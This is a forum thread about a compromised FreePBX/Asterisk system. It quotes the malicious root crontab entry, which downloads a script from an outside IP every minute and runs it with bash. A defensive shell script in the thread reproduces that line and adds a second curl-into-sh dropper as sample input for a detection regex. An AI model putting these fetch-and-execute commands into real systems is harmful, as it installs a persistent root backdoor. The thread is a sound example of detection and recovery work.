Crontab entry: has my PBX been hacked?

Hello all,
I received a warning from my telephone company today about possible unauthorized international calls from my PBX.
While looking into the installation I stumbled upon the following root crontab entry:

*/1 * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

The IP address has no reverse DNS and according to whois belongs to a company in the Netherlands. Also, the downloaded k.php looks quite fishy.

Asterisk 16.17.0

FreePBX installed from SNG7-PBX16-64bit-2105-7.iso

-Heinrich


Yes, your system has been hacked. Don’t try to clean it up. Reinstall a clean .iso and restore from a backup taken before the attack. Most likely, the cause is

See also this discussion:

If your system had been updated to one of the vulnerable versions, it is almost certain that this is what happened.

To reduce the chance of similar incidents in the future, ensure that any kind of web access to the PBX (admin, UCP, REST, etc.) is restricted to whitelisted IP addresses.
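A way to hunt for this kind of fetch-then-execute cron job across the whole host, added here as an example and not code from the thread or from FreePBX. The sample crontab text, the second attacker address 203.0.113.5 (an RFC 5737 documentation address) and the helper names are constructed; only the first flagged line is the entry posted above. It generalizes the posted entry to any cron line that downloads with wget or curl and then hands the result to a shell or script interpreter:

```shell
#!/bin/sh
# Hunt for "download, then execute" cron jobs on a FreePBX/SNG7 host.
# Added example, not from the thread or the FreePBX project.

# Constructed sample: a root crontab holding the posted entry, two benign
# jobs and a second dropper that pipes straight into sh.
SAMPLE_CRONTAB='# constructed sample crontab
0 3 * * * /usr/local/bin/backup-pbx.sh
*/1 * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
*/5 * * * * curl -s https://monitor.example.invalid/ping >/dev/null 2>&1
@reboot curl -fsSL http://203.0.113.5/x.sh | sh'

# Reads crontab text on stdin and prints every active line where a fetch
# tool (wget/curl) is followed, after ";", "|" or "&&", by an interpreter.
# A plain curl health check with no interpreter is not flagged.
suspicious_cron_lines() {
    grep -Ev '^[[:space:]]*(#|$)' \
    | grep -E '(wget|curl).*(;|\||&&)[[:space:]]*(bash|sh|perl|python[0-9.]*)([[:space:]]|$)'
}

# Same check over every crontab location on a CentOS 7 based SNG7 box:
# the system crontab, drop-ins under /etc/cron.d and per-user spools.
# Run as root on the PBX itself; the dropper above lived in root's spool.
scan_live_crontabs() {
    cat /etc/crontab /etc/cron.d/* /var/spool/cron/* 2>/dev/null \
    | suspicious_cron_lines
}

# The posted entry wrote its payload into /var/lib/asterisk/bin, so list
# files there changed within the last N days as a second indicator.
recently_changed_asterisk_bin() {
    find /var/lib/asterisk/bin -type f -mtime -"$1" 2>/dev/null
}

echo "== suspicious lines in the constructed sample =="
printf '%s\n' "$SAMPLE_CRONTAB" | suspicious_cron_lines
# On the suspect host, run instead (as root):
#   scan_live_crontabs
#   recently_changed_asterisk_bin 30
```

The regex deliberately keys on the "fetch, then run" shape rather than on a specific address or file name, so the same scan still fires when the attacker rotates the download host or the drop path. Treat a hit as confirmation for the reinstall advice above, not as something to clean by hand: the downloaded script runs as root every minute and can re-create anything you delete.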

Thank you very much. I will do a fresh install. Obviously, I must also consider my configured SIP passwords stolen and will need to change them.

-Heinrich

Just to make sure: Is SNG7-PBX16-64bit-2112-4.iso (downloaded yesterday) already patched against this exploit?

-Heinrich

Looking at the release notes it was released before the patches. Full ISOs aren't usually released that often. I would suggest running all updates anyway before restoring any backup or putting into production as part of any install.

Thanks for quick reply 🙂
I did

  • yum update
  • fwconsole ma upgradeall

Anything else to update?

Remember to do a reload after updating.
